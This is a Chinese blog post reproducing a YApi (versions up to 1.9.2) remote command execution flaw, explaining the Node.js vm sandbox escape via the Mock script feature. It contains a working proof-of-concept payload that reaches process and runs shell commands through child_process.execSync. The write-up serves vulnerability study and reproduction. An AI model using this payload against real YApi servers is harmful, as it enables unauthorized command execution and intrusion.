当前位置：网站首页>漏洞复现----34、yapi 远程命令执行漏洞

漏洞复现----34、yapi 远程命令执行漏洞

2022-06-27 15:23:00 【七天啊】

Yapi官网地址：http://yapi.smart-xwork.cn/

YAPI简介

YAPI是高效、易用、功能强大的API管理平台，旨在为开发、产品、测试人员提供更优雅的接口管理服务，提供基本的项目分组，项目管理，接口管理功能，友好的接口文档，基于websocket的多人协作接口编辑功能和类postman测试工具，让多人协作成倍提升开发效率，并且基于Mockjs，使用简单功能强大。

漏洞成因

攻击者通过注册用户，并使用 Mock 功能实现远程命令执行。命令执行的原理是 Node.js 通过 require('vm') 来构建沙箱环境，而攻击者可以通过原型链改变沙箱环境运行的上下文，从而达到沙箱逃逸的效果。通过 vm.runInNewContext("this.constructor.constructor('return process')()") 即可获得一个 process 对象。

影响版本：Yapi <= 1.9.2

漏洞复现

1、注册用户之后，新建项目

2、在设置 -> 全局mock脚本中添加恶意代码。

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("id;uname -a;pwd").toString()